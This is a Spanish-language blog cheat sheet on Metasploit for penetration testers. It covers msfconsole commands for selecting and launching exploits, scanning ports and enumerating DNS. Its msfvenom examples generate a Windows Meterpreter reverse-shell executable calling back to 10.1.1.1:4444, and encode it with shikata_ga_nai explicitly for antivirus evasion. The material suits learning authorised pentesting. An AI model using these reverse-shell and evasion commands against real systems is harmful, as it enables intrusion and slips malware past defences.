Metasploit

Hoja de trucos de Metasploit


Profile
Omar Jacobo Muñoz Veliz

Introducción

 

El Proyecto Metasploit es un proyecto de seguridad informática que proporciona información sobre vulnerabilidades y ayuda en el desarrollo de pruebas de penetración y firmas IDS.


Metasploit es una herramienta popular utilizada por los expertos de Pentest.

 

 

Trucos

 

Búsqueda de módulo:

 

msf > search [regex]

 

Especifique y explote para usar:

 

msf > use exploit/[ExploitPath]

 

Especifique una carga útil para utilizar:

 

msf > set PAYLOAD [PayloadPath]

 

Mostrar opciones para los módulos actuales:

 

msf > show options

 

Establecer opciones:

 

msf > set [Option] [Value]

 

Comience a explotar:

 

msf > exploit 

 

Módulos auxiliares útiles

 

Escáner de puertos:

 

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

 

Enumeración DNS:

 

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

 

Servidor FTP:

 

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

 

Servidor proxy:

 

msf > use auxiliary/server/socks4
msf > run 

 

Msfvenom

 

La herramienta msfvenom se puede usar para generar cargas útiles Metasploit (como Meterpreter) como archivos independientes y, opcionalmente, codificarlas. Esta herramienta reemplaza las antiguas herramientas msfpayload y msfencode. Ejecute con '' -l payloads '' para obtener una lista de cargas útiles.

 

$ msfvenom –p [PayloadPath] –f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

Ejemplo

 

Invierta la carga útil de Meterpreter como un archivo ejecutable y se redirige a un archivo:

 

$ msfvenom -p windows/meterpreter/ reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe

Opciones de formato (especificadas con –f) --help-format: muestra los formatos de salida disponibles
exe - Pl ejecutable - Perl rb - Ruby raw - Shellcode sin procesar c - Código C

 

Codificación de cargas útiles con msfvenom

 

La herramienta msfvenom se puede utilizar para aplicar un nivel de codificación para la omisión de antivirus. Ejecute con '-l codificadores' para obtener una lista de codificadores.

 

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

 

Ejemplo


Codifique una carga útil de msfpayload 5 veces usando el codificador shikata-ga-nai y ejecute como ejecutable:

 

$ msfvenom -p windows/meterpreter/ reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe



Artículos que te pueden interesar


El uso de contenedores ha facilitado la implementación de diversas herramientas con variados stacks de aplicaciones en un solo host, pero la pre... José Moreno


Continuar Leyendo

Las Webshells son scripts (código que contiene un conjunto de comandos a ejecutar) que se suben malintencionadamente en las páginas webs aprovec... Omar Jacobo Muñoz Veliz


Continuar Leyendo

En la actualidad para desarrollar un laboratorio de pentesting debes contar con una infraestructura propia, por lo general en todos los cursos d... Elzer Pineda


Continuar Leyendo